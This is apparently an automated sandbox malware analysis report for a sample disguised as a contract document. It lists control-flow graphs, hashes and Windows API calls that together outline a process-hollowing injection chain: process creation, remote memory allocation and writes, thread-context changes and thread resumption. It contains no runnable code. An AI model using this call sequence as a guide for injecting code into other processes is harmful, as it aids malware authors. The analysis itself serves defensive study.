                                                                                                                        control_flow_graph 463 791e96d-791ea05 465 791ea07-791ea11 463->465 466 791ea3e-791ea5e 463->466 465->466 467 791ea13-791ea15 465->467 471 791ea60-791ea6a 466->471 472 791ea97-791eac6 466->472 469 791ea17-791ea21 467->469 470 791ea38-791ea3b 467->470 473 791ea23 469->473 474 791ea25-791ea34 469->474 470->466 471->472 475 791ea6c-791ea6e 471->475 482 791eac8-791ead2 472->482 483 791eaff-791ebb9 CreateProcessA 472->483 473->474 474->474 476 791ea36 474->476 477 791ea91-791ea94 475->477 478 791ea70-791ea7a 475->478 476->470 477->472 480 791ea7c 478->480 481 791ea7e-791ea8d 478->481 480->481 481->481 484 791ea8f 481->484 482->483 485 791ead4-791ead6 482->485 494 791ebc2-791ec48 483->494 495 791ebbb-791ebc1 483->495 484->477 487 791eaf9-791eafc 485->487 488 791ead8-791eae2 485->488 487->483 489 791eae4 488->489 490 791eae6-791eaf5 488->490 489->490 490->490 491 791eaf7 490->491 491->487 505 791ec58-791ec5c 494->505 506 791ec4a-791ec4e 494->506 495->494 508 791ec6c-791ec70 505->508 509 791ec5e-791ec62 505->509 506->505 507 791ec50 506->507 507->505 511 791ec80-791ec84 508->511 512 791ec72-791ec76 508->512 509->508 510 791ec64 509->510 510->508 513 791ec96-791ec9d 511->513 514 791ec86-791ec8c 511->514 512->511 515 791ec78 512->515 516 791ecb4 513->516 517 791ec9f-791ecae 513->517 514->513 515->511 519 791ecb5 516->519 517->516 519->519
                                                                                                                        APIs
                                                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0791EBA6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 963392458-0
                                                                                                                        • Opcode ID: 7ffcb4ffd46f4671c509e57d9844c8e747ea1ffa49d4880b416a0ae177fca58a
                                                                                                                        • Instruction ID: 6bfb63675095cf02af3fd90360d1df0c99ba5545465f0dc8d0f2d824d079d173
                                                                                                                        • Opcode Fuzzy Hash: 7ffcb4ffd46f4671c509e57d9844c8e747ea1ffa49d4880b416a0ae177fca58a
                                                                                                                        • Instruction Fuzzy Hash: BA916CB1D0021ECFEB10CFA8C8417DDBBB6BF48315F1481A9E849A7250DB759995CF92
                                                                                                                        Function 0172AD88 Relevance: 1.7, APIs: 1, Instructions: 199COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 520 172ad88-172ad97 521 172adc3-172adc7 520->521 522 172ad99-172ada6 call 17293b4 520->522 524 172addb-172ae1c 521->524 525 172adc9-172add3 521->525 527 172ada8 522->527 528 172adbc 522->528 531 172ae29-172ae37 524->531 532 172ae1e-172ae26 524->532 525->524 576 172adae call 172b020 527->576 577 172adae call 172b011 527->577 528->521 533 172ae5b-172ae5d 531->533 534 172ae39-172ae3e 531->534 532->531 539 172ae60-172ae67 533->539 536 172ae40-172ae47 call 172a0f0 534->536 537 172ae49 534->537 535 172adb4-172adb6 535->528 538 172aef8-172afb8 535->538 541 172ae4b-172ae59 536->541 537->541 571 172afc0-172afeb GetModuleHandleW 538->571 572 172afba-172afbd 538->572 542 172ae74-172ae7b 539->542 543 172ae69-172ae71 539->543 541->539 545 172ae88-172ae8a call 172a100 542->545 546 172ae7d-172ae85 542->546 543->542 550 172ae8f-172ae91 545->550 546->545 551 172ae93-172ae9b 550->551 552 172ae9e-172aea3 550->552 551->552 553 172aec1-172aece 552->553 554 172aea5-172aeac 552->554 561 172aed0-172aeee 553->561 562 172aef1-172aef7 553->562 554->553 556 172aeae-172aebe call 172a110 call 172a120 554->556 556->553 561->562 573 172aff4-172b008 571->573 574 172afed-172aff3 571->574 572->571 574->573 576->535 577->535
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0172AFDE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1757624562.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_1720000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4139908857-0
                                                                                                                        • Opcode ID: 212c47ecb31216bf547160576c5f0178ad2b5ac448aa57a6d51525d102a30dd5
                                                                                                                        • Instruction ID: 632ee9c8dfaefb6904731c212cc147da9f639e29c25650872feedce7f8d85c51
                                                                                                                        • Opcode Fuzzy Hash: 212c47ecb31216bf547160576c5f0178ad2b5ac448aa57a6d51525d102a30dd5
                                                                                                                        • Instruction Fuzzy Hash: D9712270A00B158FD724DF29D48575ABBF1FF88204F108A2ED58AD7A50DB74E84ACB90
                                                                                                                        Function 0172590C Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 578 172590c-17259d9 CreateActCtxA 580 17259e2-1725a3c 578->580 581 17259db-17259e1 578->581 588 1725a4b-1725a4f 580->588 589 1725a3e-1725a41 580->589 581->580 590 1725a60 588->590 591 1725a51-1725a5d 588->591 589->588 593 1725a61 590->593 591->590 593->593
                                                                                                                        APIs
                                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 017259C9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1757624562.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_1720000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Create
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2289755597-0
                                                                                                                        • Opcode ID: 0274a0d7bf3ac85a2eb40371f8a2c327c800ed3b50e7a4424487294aa82a97d8
                                                                                                                        • Instruction ID: 6805e42ea725161a872a9a4d2ce92d74cab1ce299044d10cdaf65442fd61c7ef
                                                                                                                        • Opcode Fuzzy Hash: 0274a0d7bf3ac85a2eb40371f8a2c327c800ed3b50e7a4424487294aa82a97d8
                                                                                                                        • Instruction Fuzzy Hash: 06410FB1C00329CEDB24CFA9C9847DDFBB5BF48314F2480AAD418AB255DB756986CF90
                                                                                                                        Function 017244F0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 594 17244f0-17259d9 CreateActCtxA 597 17259e2-1725a3c 594->597 598 17259db-17259e1 594->598 605 1725a4b-1725a4f 597->605 606 1725a3e-1725a41 597->606 598->597 607 1725a60 605->607 608 1725a51-1725a5d 605->608 606->605 610 1725a61 607->610 608->607 610->610
                                                                                                                        APIs
                                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 017259C9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1757624562.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_1720000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Create
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2289755597-0
                                                                                                                        • Opcode ID: e45140b87cdbbcb0cb57f7e04d544ceb001ddfbc2140d5f5f76ddfea7dc9ef6d
                                                                                                                        • Instruction ID: 43aaf70355fe3df97b54f722f1c46c9c10d784f731587ed725b5d1adad0a219a
                                                                                                                        • Opcode Fuzzy Hash: e45140b87cdbbcb0cb57f7e04d544ceb001ddfbc2140d5f5f76ddfea7dc9ef6d
                                                                                                                        • Instruction Fuzzy Hash: B441D2B0C00729CBDB24DFA9C8847DDFBB5BF49314F2480AAD418AB255DB756946CF90
                                                                                                                        Function 0791E001 Relevance: 1.6, APIs: 1, Instructions: 76threadCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 611 791e001-791e008 612 791e06b-791e0d7 ResumeThread 611->612 613 791e00a-791e037 611->613 620 791e0e0-791e105 612->620 621 791e0d9-791e0df 612->621 615 791e039 613->615 616 791e03e-791e052 613->616 615->616 621->620
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ResumeThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 947044025-0
                                                                                                                        • Opcode ID: 3515387e57d3d6bc5b035d8adc2099e79344f2fa0e40ef99ef3c0105532bbaa4
                                                                                                                        • Instruction ID: 8167ccc1fee3f24e2d71851ae0386fa1ab23bc6399ca0143f43446450523a4a4
                                                                                                                        • Opcode Fuzzy Hash: 3515387e57d3d6bc5b035d8adc2099e79344f2fa0e40ef99ef3c0105532bbaa4
                                                                                                                        • Instruction Fuzzy Hash: 00218BB19042498FCB24DFA9C8447EEFBF5EB89324F20846AD868A7390C7745945CB95
                                                                                                                        Function 0791E6E0 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 625 791e6e0-791e736 628 791e746-791e785 WriteProcessMemory 625->628 629 791e738-791e744 625->629 631 791e787-791e78d 628->631 632 791e78e-791e7be 628->632 629->628 631->632
                                                                                                                        APIs
                                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0791E778
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MemoryProcessWrite
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3559483778-0
                                                                                                                        • Opcode ID: 68c4db1d7260ca4a2499621cf58e5db8b91282264b4cb313ee80ef64fe548127
                                                                                                                        • Instruction ID: 48e1d52f9336ff2ce1bc0ee749e238e47b8d1dfb630b45c817b04e7d01c7f4e8
                                                                                                                        • Opcode Fuzzy Hash: 68c4db1d7260ca4a2499621cf58e5db8b91282264b4cb313ee80ef64fe548127
                                                                                                                        • Instruction Fuzzy Hash: 7A2155B59003099FDB10DFAAC884BEEBBF5FF48314F10842AE918A7251C7789954CBA4
                                                                                                                        Function 0791E6E8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 636 791e6e8-791e736 638 791e746-791e785 WriteProcessMemory 636->638 639 791e738-791e744 636->639 641 791e787-791e78d 638->641 642 791e78e-791e7be 638->642 639->638 641->642
                                                                                                                        APIs
                                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0791E778
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MemoryProcessWrite
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3559483778-0
                                                                                                                        • Opcode ID: f8aad22cb1047f11b54d59de949a4f66f65f0d644daa18ef935de3cfc58ce5d2
                                                                                                                        • Instruction ID: de947673f498aa003065226c6f17200aa2e74cc5279ef906dfbc54864fd8ab0a
                                                                                                                        • Opcode Fuzzy Hash: f8aad22cb1047f11b54d59de949a4f66f65f0d644daa18ef935de3cfc58ce5d2
                                                                                                                        • Instruction Fuzzy Hash: AF2144B590031D9FDB10DFAAC884BDEBBF5FF48314F10842AE918A7250C7789954CBA4
                                                                                                                        Function 0791E7D3 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 656 791e7d3-791e865 ReadProcessMemory 659 791e867-791e86d 656->659 660 791e86e-791e89e 656->660 659->660
                                                                                                                        APIs
                                                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0791E858
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MemoryProcessRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1726664587-0
                                                                                                                        • Opcode ID: e59b4f2aa1b9f3bf435c1c8d35036b04bc91c9331d41d9cda036e45cd7933af6
                                                                                                                        • Instruction ID: e6ae3a2d06f07a4afb03ac7458ead219c689380dcdf022162f7be5a4951aa4d2
                                                                                                                        • Opcode Fuzzy Hash: e59b4f2aa1b9f3bf435c1c8d35036b04bc91c9331d41d9cda036e45cd7933af6
                                                                                                                        • Instruction Fuzzy Hash: F02136B19002599FCB10DFAAC884AEEFBF1FF48314F10842EE959A7251C7349950CBA4
                                                                                                                        Function 0791E110 Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 646 791e110-791e163 648 791e173-791e1a3 Wow64SetThreadContext 646->648 649 791e165-791e171 646->649 651 791e1a5-791e1ab 648->651 652 791e1ac-791e1dc 648->652 649->648 651->652
                                                                                                                        APIs
                                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0791E196
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ContextThreadWow64
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 983334009-0
                                                                                                                        • Opcode ID: 7f45f6c33618113f859697a8dfedc61822cc4d84c92bf6366d2517200db34820
                                                                                                                        • Instruction ID: b3624d6eb64cc5247084faadcb094316279b1b41dfabfce0d53bc6e9cd9abab2
                                                                                                                        • Opcode Fuzzy Hash: 7f45f6c33618113f859697a8dfedc61822cc4d84c92bf6366d2517200db34820
                                                                                                                        • Instruction Fuzzy Hash: 502137B19002098FDB10DFAAC5857EEBBF4EF88314F14842AD559A7251C7789984CFA4
                                                                                                                        Function 0172D658 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0172D6E7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1757624562.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_1720000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DuplicateHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3793708945-0
                                                                                                                        • Opcode ID: 6a8db346f71112172ab5c0afcbdc964d08b921e90e55e64dc117fda3da350a5d
                                                                                                                        • Instruction ID: 6b8c93e27a6192499970b18f14f7aaf33006ec1921f33eb3a6678cd4ad2125aa
                                                                                                                        • Opcode Fuzzy Hash: 6a8db346f71112172ab5c0afcbdc964d08b921e90e55e64dc117fda3da350a5d
                                                                                                                        • Instruction Fuzzy Hash: 7021E0B5D00219DFDB10CFAAD985ADEBBF4EB48324F14841AE918B7351D374A941CFA4
                                                                                                                        Function 0791E7D8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0791E858
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MemoryProcessRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1726664587-0
                                                                                                                        • Opcode ID: 1bdfb093c34dddb4ada0048710952f5196a0c3226f51fa7eebe7e7304688c7f7
                                                                                                                        • Instruction ID: 0442f67772c27be4eb13063bd06468a73bc96030dbb3f94f6036944303a6be19
                                                                                                                        • Opcode Fuzzy Hash: 1bdfb093c34dddb4ada0048710952f5196a0c3226f51fa7eebe7e7304688c7f7
                                                                                                                        • Instruction Fuzzy Hash: 362128B18003599FCB10DFAAC880ADEFBF5FF48314F10842AE959A7250C7749554CBA4
                                                                                                                        Function 0791E118 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0791E196
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ContextThreadWow64
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 983334009-0
                                                                                                                        • Opcode ID: 0b57f88716f9d20570d46adaad3196c23e3a226a24db4fa7a662dd02fe282bf0
                                                                                                                        • Instruction ID: f058802b45628290d31a4e49b49067a1c9504a9ef098ce557e83962cf7e7e077
                                                                                                                        • Opcode Fuzzy Hash: 0b57f88716f9d20570d46adaad3196c23e3a226a24db4fa7a662dd02fe282bf0
                                                                                                                        • Instruction Fuzzy Hash: 2C211AB1D003098FDB10DFAAC4857EEBBF4EF88314F148429D459A7251C7789544CFA5
                                                                                                                        Function 0172D660 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0172D6E7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1757624562.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_1720000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DuplicateHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3793708945-0
                                                                                                                        • Opcode ID: 55964abd309ce9bf25d235a8fc54add0d4ad50df0e4ad405d3bc6194f468fcae
                                                                                                                        • Instruction ID: 9244fa6034a16e3a2887483c416d05680138c1b275e444b9ae06c97079f6ba7c
                                                                                                                        • Opcode Fuzzy Hash: 55964abd309ce9bf25d235a8fc54add0d4ad50df0e4ad405d3bc6194f468fcae
                                                                                                                        • Instruction Fuzzy Hash: 2321E2B5900258DFDB10CFAAD984ADEFFF8EB48320F14801AE918A3310C374A940CFA4
                                                                                                                        Function 0172B011 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0172AFDE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1757624562.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_1720000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4139908857-0
                                                                                                                        • Opcode ID: e6d693abc3678bdbe3a8c7b858e8d747f67399cd9146d59539eb894915649682
                                                                                                                        • Instruction ID: 21ad50fe4fe4ed9fe9b7016a36aa6b26d48821f6f0493ef0380874a4fb09cc21
                                                                                                                        • Opcode Fuzzy Hash: e6d693abc3678bdbe3a8c7b858e8d747f67399cd9146d59539eb894915649682
                                                                                                                        • Instruction Fuzzy Hash: AA11E7B2A002158BD714DF5AD844BEAFBF5EBC4364F048029D518E7690CA78E846CBA1
                                                                                                                        Function 0791E620 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0791E696
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4275171209-0
                                                                                                                        • Opcode ID: 9078965980b5851387daf0835544a984df902e8776c8cc32dd8ce21f68549d30
                                                                                                                        • Instruction ID: c037a830d0e03bd8a6cbcdfd888ffa0f62df6fc4f3a39f68dd4687483733b25b
                                                                                                                        • Opcode Fuzzy Hash: 9078965980b5851387daf0835544a984df902e8776c8cc32dd8ce21f68549d30
                                                                                                                        • Instruction Fuzzy Hash: 541147B5900249DFCB10DFAAC844ADEBFF5EB88324F20842AE559A7250C7759554CFA4
                                                                                                                        Function 0791E628 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0791E696
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4275171209-0
                                                                                                                        • Opcode ID: 2643037ea7dcf176d0567f475686575780f5ea705229e424c8b68bd4f569e61e
                                                                                                                        • Instruction ID: de7af9f5a584503082c00954cc2efad3a5c0ab68e127bc3b6336718111309d61
                                                                                                                        • Opcode Fuzzy Hash: 2643037ea7dcf176d0567f475686575780f5ea705229e424c8b68bd4f569e61e
                                                                                                                        • Instruction Fuzzy Hash: A81126B19002499FCB10DFAAC844BDEBFF5EB88324F108819E559A7250C775A554CFA4
                                                                                                                        Function 07913414 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • OutputDebugStringW.KERNELBASE(00000000), ref: 079141C8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DebugOutputString
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1166629820-0
                                                                                                                        • Opcode ID: c575ac68490ad8b418ec913d7a253c6260ee9e24267ef32b713244b6b0d8813a
                                                                                                                        • Instruction ID: bf44751e66a4d010937e8304a0da203ea5aff72174c199bf27e0b5084453ebc4
                                                                                                                        • Opcode Fuzzy Hash: c575ac68490ad8b418ec913d7a253c6260ee9e24267ef32b713244b6b0d8813a
                                                                                                                        • Instruction Fuzzy Hash: 631144B1C006599BCB00DF9AD844B9EFBF4EB58324F20812AD818B7310C374A954CFA4
                                                                                                                        Function 07914150 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • OutputDebugStringW.KERNELBASE(00000000), ref: 079141C8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DebugOutputString
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1166629820-0
                                                                                                                        • Opcode ID: dcc2caa96507db5463282267729194802d3a810869a4d4366fa0c76457868048
                                                                                                                        • Instruction ID: f4cd99568e5d32deec5e656b6936c9cd46b78aae939dac2ba769e3ae01b24404
                                                                                                                        • Opcode Fuzzy Hash: dcc2caa96507db5463282267729194802d3a810869a4d4366fa0c76457868048
                                                                                                                        • Instruction Fuzzy Hash: 8A1123F6C0065ADBCB04CF9AD945B9EFBB4FB58324F21852AD828B3250D334A550CFA5
                                                                                                                        Function 0791E060 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ResumeThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 947044025-0
                                                                                                                        • Opcode ID: baf7b7c3de1b810ae8dff8ff3338c0103aff773ce4ab466558cf24d3204b1859
                                                                                                                        • Instruction ID: 351693f1d8aec73098c8072320a37c61bf193f376b73cd9f8a06b5ce3bcfeb37
                                                                                                                        • Opcode Fuzzy Hash: baf7b7c3de1b810ae8dff8ff3338c0103aff773ce4ab466558cf24d3204b1859
                                                                                                                        • Instruction Fuzzy Hash: AE116AB1900249CFCB20DFAAC4447DEFBF5EF88324F20882AD559A7250C779A944CF94
                                                                                                                        Function 0791E068 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ResumeThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 947044025-0
                                                                                                                        • Opcode ID: 36a42edd3d3625e6b0da33c3143a51afccc45331dabc0e03cbc6c3930f3f015a
                                                                                                                        • Instruction ID: 1da5468653ab2f5ece276730e7137056ec707494a9e64a5ce8209213159a83a9
                                                                                                                        • Opcode Fuzzy Hash: 36a42edd3d3625e6b0da33c3143a51afccc45331dabc0e03cbc6c3930f3f015a
                                                                                                                        • Instruction Fuzzy Hash: 30113AB19003498FCB20DFAAC4457DEFBF4EB88324F208829D559A7250CB75A544CF94
                                                                                                                        Function 0172AF78 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0172AFDE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1757624562.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_1720000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4139908857-0
                                                                                                                        • Opcode ID: ccaebea50282e081ed38c439eea0e4417e35bf85a0f5f229ab7eeca4814bdd6e
                                                                                                                        • Instruction ID: 746b190a96b668e9132b95722b22e3afc5070df2d48c927c8d6ff232687ade24
